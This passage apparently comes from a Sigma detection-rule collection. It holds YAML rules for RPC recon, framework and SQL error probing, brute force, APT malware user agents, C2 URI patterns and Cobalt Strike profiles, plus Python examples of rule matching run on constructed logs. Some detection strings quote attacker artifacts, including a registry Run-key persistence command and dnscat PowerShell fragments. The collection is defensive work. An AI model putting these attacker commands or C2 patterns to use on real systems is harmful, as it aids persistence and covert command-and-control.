  24. InterfaceUuid: 6bffd098-a112-3610-9833-46c3f87e345a
  25. OpNum: 2
  26. condition: selection
  27. falsepositives:
  28. - Unknown
  29. level: high

SharpHound Recon Sessions

  1. title: SharpHound Recon Sessions
  2. id: 6d580420-ff3f-4e0e-b6b0-41b90c787e28
  3. description: Detects remote RPC calls used by SharpHound to map remote connections and local group membership.
  4. references:
  5. - https://attack.mitre.org/techniques/T1033/
  6. - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183
  7. - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-SRVS.md
  8. - https://github.com/zeronetworks/rpcfirewall
  9. - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  10. tags:
  11. - attack.t1033
  12. status: experimental
  13. author: Sagie Dulce, Dekel Paz
  14. date: 2022/01/01
  15. modified: 2022/01/01
  16. logsource:
  17. product: rpc_firewall
  18. category: application
  19. definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188 opnum:12"'
  20. detection:
  21. selection:
  22. EventLog: RPCFW
  23. EventID: 3
  24. InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188
  25. OpNum: 12
  26. condition: selection
  27. falsepositives:
  28. - Unknown
  29. level: high

ruby

Ruby on Rails Framework Exceptions

  1. title: Ruby on Rails Framework Exceptions
  2. id: 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a
  3. status: stable
  4. description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
  5. author: Thomas Patzke
  6. date: 2017/08/06
  7. modified: 2020/09/01
  8. references:
  9. - http://edgeguides.rubyonrails.org/security.html
  10. - http://guides.rubyonrails.org/action_controller_overview.html
  11. - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception
  12. - https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb
  13. logsource:
  14. category: application
  15. product: ruby_on_rails
  16. detection:
  17. keywords:
  18. - ActionController::InvalidAuthenticityToken
  19. - ActionController::InvalidCrossOriginRequest
  20. - ActionController::MethodNotAllowed
  21. - ActionController::BadRequest
  22. - ActionController::ParameterMissing
  23. condition: keywords
  24. falsepositives:
  25. - Application bugs
  26. - Penetration testing
  27. level: medium
  28. tags:
  29. - attack.initial_access
  30. - attack.t1190

spring

Spring Framework Exceptions

  1. title: Spring Framework Exceptions
  2. id: ae48ab93-45f7-4051-9dfe-5d30a3f78e33
  3. status: stable
  4. description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts
  5. author: Thomas Patzke
  6. date: 2017/08/06
  7. modified: 2020/09/01
  8. references:
  9. - https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html
  10. logsource:
  11. category: application
  12. product: spring
  13. detection:
  14. keywords:
  15. - AccessDeniedException
  16. - CsrfException
  17. - InvalidCsrfTokenException
  18. - MissingCsrfTokenException
  19. - CookieTheftException
  20. - InvalidCookieException
  21. - RequestRejectedException
  22. condition: keywords
  23. falsepositives:
  24. - Application bugs
  25. - Penetration testing
  26. level: medium
  27. tags:
  28. - attack.initial_access
  29. - attack.t1190

sql

Suspicious SQL Error Messages

  1. title: Suspicious SQL Error Messages
  2. id: 8a670c6d-7189-4b1c-8017-a417ca84a086
  3. status: test
  4. description: Detects SQL error messages that indicate probing for an injection attack
  5. author: Bjoern Kimminich
  6. references:
  7. - http://www.sqlinjection.net/errors
  8. date: 2017/11/27
  9. modified: 2021/11/27
  10. logsource:
  11. category: application
  12. product: sql
  13. detection:
  14. keywords:
  15. # Oracle
  16. - quoted string not properly terminated
  17. # MySQL
  18. - You have an error in your SQL syntax
  19. # SQL Server
  20. - Unclosed quotation mark
  21. # SQLite
  22. - 'near "*": syntax error'
  23. - SELECTs to the left and right of UNION do not have the same number of result columns
  24. condition: keywords
  25. falsepositives:
  26. - Application bugs
  27. level: high
  28. tags:
  29. - attack.initial_access
  30. - attack.t1190

apt

Silence.Downloader V3

  1. title: Silence.Downloader V3
  2. id: 170901d1-de11-4de7-bccb-8fa13678d857
  3. status: test
  4. description: Detects Silence downloader. These commands are hardcoded into the binary.
  5. author: Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community
  6. date: 2019/11/01
  7. modified: 2021/11/27
  8. logsource:
  9. category: process_creation
  10. product: windows
  11. detection:
  12. selection_recon:
  13. Image|endswith:
  14. - '\tasklist.exe'
  15. - '\qwinsta.exe'
  16. - '\ipconfig.exe'
  17. - '\hostname.exe'
  18. CommandLine|contains: '>>'
  19. CommandLine|endswith: 'temps.dat'
  20. selection_persistence:
  21. CommandLine|contains: '/C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinNetworkSecurity" /t REG_SZ /d'
  22. condition: selection_recon | near selection_persistence # requires both
  23. fields:
  24. - ComputerName
  25. - User
  26. - Image
  27. - CommandLine
  28. falsepositives:
  29. - Unknown
  30. level: high
  31. tags:
  32. - attack.persistence
  33. - attack.t1547.001
  34. - attack.discovery
  35. - attack.t1057
  36. - attack.t1082
  37. - attack.t1016
  38. - attack.t1033
  39. - attack.g0091
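The string-matching semantics these rules rely on, implemented and run over constructed input as an added example (not code from the Sigma project or any of its backends). It covers the keyword list of "Suspicious SQL Error Messages" above, including the `*` wildcard in the SQLite entry, and the selection_recon of "Silence.Downloader V3"; the log lines, process events and the Python field names are constructed.

```python
"""Sigma string matching as used by the rules on this page.

Added example, not code from the Sigma project or one of its backends.
Semantics implemented: plain values match case-insensitively, as a
substring for keyword lists and exactly for field values; the modifiers
contains/startswith/endswith relax the field match; '*' matches any run
of characters and '?' one character; a list of values is OR, a '|all'
modifier is AND, and every field line of a selection must hold.
"""
import re

# Keyword list of 'Suspicious SQL Error Messages' (copied from the rule above).
SQL_ERROR_KEYWORDS = [
    "quoted string not properly terminated",   # Oracle
    "You have an error in your SQL syntax",    # MySQL
    "Unclosed quotation mark",                 # SQL Server
    'near "*": syntax error',                  # SQLite, contains a wildcard
    "SELECTs to the left and right of UNION do not have the same number of result columns",
]

# selection_recon of 'Silence.Downloader V3' (copied from the rule above).
SILENCE_RECON_SELECTION = {
    "Image|endswith": ["\\tasklist.exe", "\\qwinsta.exe", "\\ipconfig.exe", "\\hostname.exe"],
    "CommandLine|contains": ">>",
    "CommandLine|endswith": "temps.dat",
}


def sigma_regex(value, mode="contains"):
    """Compile one Sigma string value; mode is contains, startswith, endswith or exact."""
    body = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in value)
    prefix = "^" if mode in ("startswith", "exact") else ""
    suffix = "$" if mode in ("endswith", "exact") else ""
    return re.compile(prefix + body + suffix, re.IGNORECASE | re.DOTALL)


def field_matches(event, field_spec, values):
    """Evaluate one field line such as 'CommandLine|contains': '>>' against an event dict."""
    name, *mods = field_spec.split("|")
    actual = event.get(name)
    if actual is None:
        return False
    mode = next((m for m in mods if m in ("contains", "startswith", "endswith")), "exact")
    values = values if isinstance(values, list) else [values]
    hits = [sigma_regex(v, mode).search(str(actual)) is not None for v in values]
    return all(hits) if "all" in mods else any(hits)  # list = OR, |all = AND


def selection_matches(event, selection):
    """A selection is a map of field lines; all of them must hold."""
    return all(field_matches(event, spec, vals) for spec, vals in selection.items())


def keyword_hits(line, keywords):
    """Keyword lists match anywhere in the raw log line, case-insensitively."""
    return [kw for kw in keywords if sigma_regex(kw, "contains").search(line)]


def scan_sql_log(lines):
    """Return (line, first matching keyword) for every line that triggers the SQL error rule."""
    out = []
    for line in lines:
        hits = keyword_hits(line, SQL_ERROR_KEYWORDS)
        if hits:
            out.append((line, hits[0]))
    return out


def silence_recon_hits(events):
    """Process-creation events that satisfy the Silence selection_recon."""
    return [e for e in events if selection_matches(e, SILENCE_RECON_SELECTION)]


SQL_LOG_LINES = [  # constructed application log lines
    "ORA-01756: quoted string not properly terminated",
    "ERROR 1064 (42000): You have an error in your SQL syntax; check the manual",
    "sqlite3.OperationalError: near \"'\": syntax error",
    "GET /search?q=books 200 12ms",
]

PROCESS_EVENTS = [  # constructed process_creation events; field names as in the rule
    {"Image": "C:\\Windows\\System32\\tasklist.exe",
     "CommandLine": "tasklist.exe >> C:\\Users\\Public\\temps.dat"},
    {"Image": "C:\\Windows\\System32\\tasklist.exe",
     "CommandLine": "tasklist.exe /svc"},
    {"Image": "C:\\Windows\\System32\\net.exe",
     "CommandLine": "net user >> C:\\Users\\Public\\temps.dat"},
]

if __name__ == "__main__":
    for line, kw in scan_sql_log(SQL_LOG_LINES):
        print(f"SQL error rule hit on {kw!r}: {line}")
    print(len(silence_recon_hits(PROCESS_EVENTS)), "Silence recon match(es)")
```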

Silence EDA Detection

  1. title: Silence EDA Detection
  2. id: 3ceb2083-a27f-449a-be33-14ec1b7cc973
  3. status: test
  4. description: Detects Silence empireDNSagent
  5. author: Alina Stepchenkova, Group-IB, oscd.community
  6. date: 2019/11/01
  7. modified: 2021/11/27
  8. logsource:
  9. product: windows
  10. service: powershell
  11. detection:
  12. empire:
  13. ScriptBlockText|contains|all: # better to randomise the order
  14. - 'System.Diagnostics.Process'
  15. - 'Stop-Computer'
  16. - 'Restart-Computer'
  17. - 'Exception in execution'
  18. - '$cmdargs'
  19. - 'Close-Dnscat2Tunnel'
  20. dnscat:
  21. ScriptBlockText|contains|all: # better to randomise the order
  22. - 'set type=$LookupType`nserver'
  23. - '$Command | nslookup 2>&1 | Out-String'
  24. - 'New-RandomDNSField'
  25. - '[Convert]::ToString($SYNOptions, 16)'
  26. - '$Session.Dead = $True'
  27. - '$Session["Driver"] -eq'
  28. condition: empire and dnscat
  29. falsepositives:
  30. - Unknown
  31. level: critical
  32. tags:
  33. - attack.execution
  34. - attack.t1059.001
  35. - attack.command_and_control
  36. - attack.t1071.004
  37. - attack.t1572
  38. - attack.impact
  39. - attack.t1529
  40. - attack.g0091
  41. - attack.s0363

cloud

aws

azure

gcp

gworkspace

m365

okta

onelogin

compliance

default_credentials_usage.yml
firewall_cleartext_protocols.yml
group_modification_logging.yml
host_without_firewall.yml
netflow_cleartext_protocols.yml
workstation_was_locked.yml

generic

Brute Force

  1. title: Brute Force
  2. id: 53c7cca0-2901-493a-95db-d00d6fcf0a37
  3. status: test
  4. description: Detects many authentication failures from one source to one destination, which may indicate Brute Force activity
  5. author: Aleksandr Akhremchik, oscd.community
  6. date: 2019/10/25
  7. modified: 2021/11/27
  8. logsource:
  9. category: authentication
  10. detection:
  11. selection:
  12. action: failure
  13. timeframe: 600s
  14. condition: selection | count(category) by dst_ip > 30
  15. fields:
  16. - src_ip
  17. - dst_ip
  18. - user
  19. falsepositives:
  20. - Inventarization
  21. - Penetration testing
  22. - Vulnerability scanner
  23. - Legitimate application
  24. level: medium
  25. tags:
  26. - attack.credential_access
  27. - attack.t1110
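The rule's windowed count (`count(category) by dst_ip > 30` within `timeframe: 600s`), run over constructed authentication events as an added example (not code from the Sigma project or any backend); the event field names timestamp, category, action, src_ip, dst_ip and user are assumed.

```python
"""Time-window aggregation for the 'Brute Force' rule above.

Added example, not code from the Sigma project or a backend. It raises an
alert when more than 30 authentication failures hit the same dst_ip inside
any 600-second window, which is what the rule's aggregation expresses.
Events are constructed; their field names are assumed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

TIMEFRAME = timedelta(seconds=600)
THRESHOLD = 30  # condition is "> 30": the 31st failure inside a window alerts


def in_selection(event):
    """The rule's selection: authentication events with action: failure."""
    return event.get("category") == "authentication" and event.get("action") == "failure"


def detect_brute_force(events, timeframe=TIMEFRAME, threshold=THRESHOLD):
    """Sliding window per dst_ip; one alert per dst_ip the first time it crosses the threshold."""
    windows = defaultdict(deque)  # dst_ip -> deque of (timestamp, src_ip, user)
    alerts, alerted = [], set()
    for ev in sorted(events, key=lambda e: e["timestamp"]):
        if not in_selection(ev):
            continue
        dst = ev["dst_ip"]
        win = windows[dst]
        win.append((ev["timestamp"], ev["src_ip"], ev["user"]))
        # drop failures older than the timeframe relative to the newest event
        while ev["timestamp"] - win[0][0] > timeframe:
            win.popleft()
        if len(win) > threshold and dst not in alerted:
            alerted.add(dst)
            alerts.append({
                "dst_ip": dst,
                "count": len(win),
                "src_ips": sorted({s for _, s, _ in win}),  # the rule's output fields
                "users": sorted({u for _, _, u in win}),
                "window_start": win[0][0],
                "window_end": ev["timestamp"],
            })
    return alerts


def build_sample_events():
    """Constructed authentication log: one real burst, one slow trickle, some successes."""
    t0 = datetime(2022, 1, 1, 12, 0, tzinfo=timezone.utc)
    events = []
    # 35 failures in under three minutes against 10.0.0.5: exceeds 30 inside 600s
    for i in range(35):
        events.append({"timestamp": t0 + timedelta(seconds=5 * i), "category": "authentication",
                       "action": "failure", "src_ip": "192.0.2.10", "dst_ip": "10.0.0.5",
                       "user": f"user{i % 3}"})
    # 40 failures one minute apart against 10.0.0.6: never more than 11 in any 600s window
    for i in range(40):
        events.append({"timestamp": t0 + timedelta(minutes=i), "category": "authentication",
                       "action": "failure", "src_ip": "192.0.2.11", "dst_ip": "10.0.0.6",
                       "user": "svc_backup"})
    # successes are outside the selection and must not be counted
    for i in range(40):
        events.append({"timestamp": t0 + timedelta(seconds=i), "category": "authentication",
                       "action": "success", "src_ip": "192.0.2.12", "dst_ip": "10.0.0.5",
                       "user": "alice"})
    return events


if __name__ == "__main__":
    for a in detect_brute_force(build_sample_events()):
        print(f"{a['dst_ip']}: {a['count']} failures from {a['src_ips']} "
              f"between {a['window_start']:%H:%M:%S} and {a['window_end']:%H:%M:%S}")
```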

linux

auditd

builtin

file_create

macos

modsecurity

network_connection

other

process_creation

network

net_apt_equationgroup_c2.yml
net_dns_c2_detection.yml
net_firewall_high_dns_bytes_out.yml
net_firewall_high_dns_requests_rate.yml
net_high_dns_bytes_out.yml
net_high_dns_requests_rate.yml
net_high_null_records_requests_rate.yml
net_high_txt_records_requests_rate.yml
net_mal_dns_cobaltstrike.yml
net_pua_cryptocoin_mining_xmr.yml
net_susp_dns_b64_queries.yml
net_susp_dns_txt_exec_strings.yml
net_susp_network_scan_by_ip.yml
net_susp_network_scan_by_port.yml
net_susp_telegram_api.yml
net_wannacry_killswitch_domain.yml

cisco/aaa

cisco_cli_clear_logs.yml
cisco_cli_collect_data.yml
cisco_cli_crypto_actions.yml
cisco_cli_disable_logging.yml
cisco_cli_discovery.yml
cisco_cli_dos.yml
cisco_cli_file_deletion.yml
cisco_cli_input_capture.yml
cisco_cli_local_accounts.yml
cisco_cli_modify_config.yml
cisco_cli_moving_data.yml
cisco_cli_net_sniff.yml

zeek

zeek_dce_rpc_domain_user_enumeration.yml
zeek_dce_rpc_mitre_bzar_execution.yml
zeek_dce_rpc_mitre_bzar_persistence.yml
zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
zeek_dce_rpc_printnightmare_print_driver_install.yml
zeek_dce_rpc_smb_spoolss_named_pipe.yml
zeek_default_cobalt_strike_certificate.yml
zeek_dns_mining_pools.yml
zeek_dns_suspicious_zbit_flag.yml
zeek_dns_torproxy.yml
zeek_http_executable_download_from_webdav.yml
zeek_http_omigod_no_auth_rce.yml
zeek_http_webdav_put_request.yml
zeek_rdp_public_listener.yml
zeek_smb_converted_win_atsvc_task.yml
zeek_smb_converted_win_impacket_secretdump.yml
zeek_smb_converted_win_lm_namedpipe.yml
zeek_smb_converted_win_susp_psexec.yml
zeek_smb_converted_win_susp_raccess_sensitive_fext.yml
zeek_smb_converted_win_transferring_files_with_credential_data.yml
zeek_susp_kerberos_rc4.yml

proxy

proxy_download_susp_dyndns.yml
proxy_download_susp_tlds_blacklist.yml
proxy_download_susp_tlds_whitelist.yml
proxy_downloadcradle_webdav.yml
proxy_empire_ua_uri_combos.yml
proxy_empty_ua.yml
proxy_ios_implant.yml
proxy_java_class_download.yml
proxy_pwndrop.yml
proxy_raw_paste_service_access.yml
proxy_susp_flash_download_loc.yml
proxy_telegram_api.yml
proxy_ua_bitsadmin_susp_tld.yml
proxy_ua_cryptominer.yml
proxy_ua_frameworks.yml
proxy_ua_hacktool.yml
proxy_ua_malware.yml
proxy_ua_suspicious.yml
proxy_ursnif_malware_c2_url.yml
proxy_ursnif_malware_download_url.yml

APT

APT40 Dropbox Tool User Agent

  1. title: APT40 Dropbox Tool User Agent
  2. id: 5ba715b6-71b7-44fd-8245-f66893e81b3d
  3. status: test
  4. description: Detects suspicious user agent string of APT40 Dropbox tool
  5. author: Thomas Patzke
  6. references:
  7. - Internal research from Florian Roth
  8. date: 2019/11/12
  9. modified: 2021/11/27
  10. logsource:
  11. category: proxy
  12. detection:
  13. selection:
  14. c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'
  15. r-dns: 'api.dropbox.com'
  16. condition: selection
  17. fields:
  18. - c-ip
  19. - c-uri
  20. falsepositives:
  21. - Old browsers
  22. level: high
  23. tags:
  24. - attack.command_and_control
  25. - attack.t1071.001
  26. - attack.exfiltration
  27. - attack.t1567.002

Domestic Kitten FurBall Malware Pattern

  1. title: Domestic Kitten FurBall Malware Pattern
  2. id: 6c939dfa-c710-4e12-a4dd-47e1f10e68e1
  3. status: experimental
  4. description: Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group
  5. author: Florian Roth
  6. references:
  7. - https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/
  8. date: 2021/02/08
  9. tags:
  10. - attack.command_and_control
  11. logsource:
  12. category: proxy
  13. detection:
  14. selection:
  15. c-uri|contains:
  16. - 'Get~~~AllBrowser'
  17. - 'Get~~~HardwareInfo'
  18. - 'Take~~RecordCall'
  19. - 'Reset~~~AllCommand'
  20. condition: selection
  21. fields:
  22. - c-ip
  23. - c-uri
  24. falsepositives:
  25. - Unlikely
  26. level: high

BabyShark Agent Pattern

  1. title: BabyShark Agent Pattern
  2. id: 304810ed-8853-437f-9e36-c4975c3dfd7e
  3. status: experimental
  4. description: Detects Baby Shark C2 Framework communication patterns
  5. author: Florian Roth
  6. date: 2021/06/09
  7. references:
  8. - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
  9. logsource:
  10. category: proxy
  11. detection:
  12. selection:
  13. c-uri|contains: 'momyshark?key='
  14. condition: selection
  15. falsepositives:
  16. - Unknown
  17. level: critical
  18. tags:
  19. - attack.command_and_control
  20. - attack.t1071.001

Chafer Malware URL Pattern

  1. title: Chafer Malware URL Pattern
  2. id: fb502828-2db0-438e-93e6-801c7548686d
  3. status: test
  4. description: Detects HTTP requests used by Chafer malware
  5. author: Florian Roth
  6. references:
  7. - https://securelist.com/chafer-used-remexi-malware/89538/
  8. date: 2019/01/31
  9. modified: 2021/11/27
  10. logsource:
  11. category: proxy
  12. detection:
  13. selection:
  14. c-uri|contains: '/asp.asp?ui='
  15. condition: selection
  16. fields:
  17. - ClientIP
  18. - c-uri
  19. - c-useragent
  20. falsepositives:
  21. - Unknown
  22. level: critical
  23. tags:
  24. - attack.command_and_control
  25. - attack.t1071.001

Turla ComRAT

  1. title: Turla ComRAT
  2. id: 7857f021-007f-4928-8b2c-7aedbe64bb82
  3. status: test
  4. description: Detects Turla ComRAT patterns
  5. author: Florian Roth
  6. references:
  7. - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
  8. date: 2020/05/26
  9. modified: 2021/11/27
  10. logsource:
  11. category: proxy
  12. detection:
  13. selection:
  14. c-uri|contains: '/index/index.php?h='
  15. condition: selection
  16. falsepositives:
  17. - Unknown
  18. level: critical
  19. tags:
  20. - attack.defense_evasion
  21. - attack.command_and_control
  22. - attack.t1071.001
  23. - attack.g0010

APT UserAgent

  1. title: APT UserAgent
  2. id: 6ec820f2-e963-4801-9127-d8b2dce4d31b
  3. status: test
  4. description: Detects suspicious user agent strings used in APT malware in proxy logs
  5. author: Florian Roth, Markus Neis
  6. references:
  7. - Internal Research
  8. date: 2019/11/12
  9. modified: 2021/11/30
  10. logsource:
  11. category: proxy
  12. detection:
  13. selection:
  14. c-useragent:
  15. # APT Related
  16. - 'SJZJ (compatible; MSIE 6.0; Win32)' # APT Backspace
  17. - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0' # APT GrizzlySteppe - ChopStick - US CERT https://goo.gl/1DTHwi
  18. - 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC' # Comment Crew Miniasp
  19. - 'Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)' # Comment Crew Miniasp
  20. - 'webclient' # Naikon APT
  21. - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200' # Naikon APT
  22. - 'Mozilla/4.0 (compatible; MSI 6.0;' # SnowGlobe Babar - yes, it is cut
  23. - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # Sofacy - Xtunnel
  24. - 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/' # Sofacy - Xtunnel
  25. - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2' # Sofacy - Xtunnel
  26. - 'Mozilla/4.0' # Derusbi backdoor ELF https://github.com/fideliscyber/indicators/tree/master/FTA-1021
  27. - 'Netscape' # Unit78020 Malware
  28. - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7' # Unit78020 Malware
  29. - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1' # Winnti related
  30. - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)' # Winnti related
  31. - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)' # APT17
  32. - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)' # Bronze Butler - Daserf
  33. - 'Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)' # Bronze Butler - Daserf
  34. - 'Mozilla/4.0 (compatible; MSIE 8.0; Win32)' # TSCookie https://app.any.run/tasks/0996b314-5133-491b-8d23-d431ffdec597
  35. - 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1' # Delphi downloader https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
  36. - 'Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)' # VPNFilter https://blog.talosintelligence.com/2018/05/VPNFilter.html
  37. - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
  38. - 'Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
  39. - 'Mozilla v5.1 *' # Sofacy Zebrocy samples
  40. - 'MSIE 8.0' # Sofacy Azzy Backdoor from https://www.hybrid-analysis.com/sample/a80e29c0757bee05338fd5c22a542d852ad86c477068e3eb4aacc1c3e59e2eef?environmentId=100
  41. - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)' # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html
  42. - 'Mozilla/4.0 (compatible; RMS)' # Attacks on industrial enterprises using RMS and TeamViewer https://goo.gl/GthvTw
  43. - 'Mozilla/4.0 (compatible; MSIE 6.0; DynGate)' # Attacks on industrial enterprises using RMS and TeamViewer https://goo.gl/GthvTw
  44. - 'O/9.27 (W; U; Z)' # Cmstar https://www.virustotal.com/#/file/e4328011bb2b04abc856ccd04404c9f95d67167f6c291d343e8ffa8aa2aa2099/details
  45. - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0*' # KerrDown UA https://goo.gl/s2WU6o
  46. - 'Mozilla/5.0 (Windows NT 9; *' # Suspicious 'Windows NT 9' user agent - used by APT33 malware in 2018
  47. - 'hots scot' # Unknown iOS zero-day implant https://twitter.com/craiu/status/1176437994288484352?s=20
  48. - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT)' # https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/
  49. - 'Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36' # Hidden Cobra malware
  50. - 'Mozilla/5.0 (Windows NT 6.2; Win32; rv:47.0)' # Strong Pity loader https://twitter.com/VK_Intel/status/1264185981118406657
  51. - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;' # Mustang Panda https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/
  52. - 'Mozilla/5.0 (X11; Linux i686; rv:22.0) Firefox/22.0' # BackdoorDiplomacy https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/
  53. - 'Mozilla/5.0 Chrome/72.0.3626.109 Safari/537.36' # SideWalk malware used by Sparkling Goblin
  54. - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0' # LitePower stager used by WIRTE https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/
  55. condition: selection
  56. fields:
  57. - ClientIP
  58. - c-uri
  59. - c-useragent
  60. falsepositives:
  61. - Old browsers
  62. level: high
  63. tags:
  64. - attack.command_and_control
  65. - attack.t1071.001

CobaltStrike

Cobalt Strike Malleable Amazon Browsing Traffic Profile

  1. title: CobaltStrike Malleable Amazon Browsing Traffic Profile
  2. id: 953b895e-5cc9-454b-b183-7f3db555452e
  3. status: test
  4. description: Detects Malleable Amazon Profile
  5. author: Markus Neis
  6. references:
  7. - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/amazon.profile
  8. - https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100
  9. date: 2019/11/12
  10. modified: 2021/11/27
  11. logsource:
  12. category: proxy
  13. detection:
  14. selection1:
  15. c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
  16. cs-method: 'GET'
  17. c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books'
  18. cs-host: 'www.amazon.com'
  19. cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996'
  20. selection2:
  21. c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
  22. cs-method: 'POST'
  23. c-uri: '/N4215/adj/amzn.us.sr.aps'
  24. cs-host: 'www.amazon.com'
  25. condition: selection1 or selection2
  26. falsepositives:
  27. - Unknown
  28. level: high
  29. tags:
  30. - attack.defense_evasion
  31. - attack.command_and_control
  32. - attack.t1071.001

Cobalt Strike Malformed UAs in Malleable Profiles

  1. title: CobaltStrike Malformed UAs in Malleable Profiles
  2. id: 41b42a36-f62c-4c34-bd40-8cb804a34ad8
  3. status: experimental
  4. description: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
  5. author: Florian Roth
  6. date: 2021/05/06
  7. modified: 2021/11/02
  8. references:
  9. - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/
  10. logsource:
  11. category: proxy
  12. detection:
  13. selection1:
  14. c-useragent:
  15. - 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)'
  16. - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E )'
  17. - 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'
  18. selection2:
  19. c-useragent|endswith: '; MANM; MANM)'
  20. condition: 1 of selection*
  21. falsepositives:
  22. - Unknown
  23. level: critical
  24. tags:
  25. - attack.defense_evasion
  26. - attack.command_and_control
  27. - attack.t1071.001

CobaltStrike Malleable (OCSP) Profile

  1. title: CobaltStrike Malleable (OCSP) Profile
  2. id: 37325383-740a-403d-b1a2-b2b4ab7992e7
  3. status: test
  4. description: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
  5. author: Markus Neis
  6. references:
  7. - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/ocsp.profile
  8. date: 2019/11/12
  9. modified: 2021/11/27
  10. logsource:
  11. category: proxy
  12. detection:
  13. selection:
  14. c-uri|contains: '/oscp/'
  15. cs-host: 'ocsp.verisign.com'
  16. condition: selection
  17. falsepositives:
  18. - Unknown
  19. level: high
  20. tags:
  21. - attack.defense_evasion
  22. - attack.command_and_control
  23. - attack.t1071.001

CobaltStrike Malleable OneDrive Browsing Traffic Profile

  1. title: CobaltStrike Malleable OneDrive Browsing Traffic Profile
  2. id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc
  3. status: test
  4. description: Detects Malleable OneDrive Profile
